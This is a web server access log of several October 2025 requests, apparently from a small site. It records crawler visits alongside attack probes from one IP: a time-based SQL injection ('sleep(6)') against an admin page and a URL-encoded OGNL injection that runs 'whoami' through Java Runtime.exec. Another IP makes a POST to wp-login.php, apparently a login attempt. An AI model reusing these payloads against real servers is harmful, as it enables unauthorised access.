157.20.32.210 - - [18/Oct/2025:11:05:46 -0400] "GET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1" 404 12366 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
157.20.32.210 - - [18/Oct/2025:11:05:53 -0400] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 404 10901 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:11:06:33 -0400] "GET /products14828966?kg=0014648206 HTTP/1.1" 200 29102 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:11:06:42 -0400] "GET /products60941904?kg=0060198793 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.227.252.214 - - [18/Oct/2025:11:06:53 -0400] "GET /wp-login.php HTTP/1.1" 200 2082 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:11:07:02 -0400] "POST /api/content/ HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0"
103.227.252.214 - - [18/Oct/2025:11:07:05 -0400] "POST /wp-login.php HTTP/1.1" 200 2174 "https://salhab360photos.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:11:07:06 -0400] "POST /admin/asign-single-student-subjects.php HTTP/1.1" 404 10852 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
